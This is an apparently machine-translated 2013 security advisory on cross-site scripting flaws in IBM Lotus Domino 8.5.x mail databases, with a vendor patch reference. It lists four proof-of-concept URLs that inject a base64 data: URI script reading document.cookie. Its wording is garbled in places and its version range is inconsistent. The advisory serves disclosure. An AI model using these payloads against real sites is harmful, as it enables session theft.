Released on: 2013-03-26
Updated on: 2013-03-27
Affected Systems:
IBM Lotus Domino 8.5.3
IBM Lotus Domino 8.5.2
IBM Lotus Domino 8.5.1
IBM Lotus Domino 8.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58715
IBM Lotus Domino is a server product that provides enterprise-level email, collaboration, and custom application platforms.
IBM Lotus Domino 8.5.4 and earlier versions are in 'x. multiple cross-site scripting vulnerabilities exist in nsf implementation. data: and vbscript: URI can exploit this vulnerability to execute attacks, resulting in arbitrary code execution in browsers of affected sites.
<* Source: MustLive (mustlive@websecurity.com.ua)
Link: http://seclists.org/fulldisclosure/2013/Mar/219? Utm_source = twitterfeed & utm_medium = twitter
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http: // site/mail/x. nsf/CalendarFS? OpenFrameSet & Frame = NotesView & Src = data: text/html; base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ % 2B
Http: // site/mail/x. nsf/WebInteriorCalendarFS? OpenFrameSet & Frame = NotesView & Src = data: text/html; base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ % 2B
Http: // site/mail/x. nsf/ToDoFS? OpenFrameSet? OpenFrameSet & Frame = NotesView & Src = data: text/html; base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ % 2B
Http: // site/mail/x. nsf/WebInteriorToDoFS? OpenFrameSet & Frame = NotesView & Src = data: text/html; base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ % 2B
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
IBM
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.ibm.com/support/fixcentral/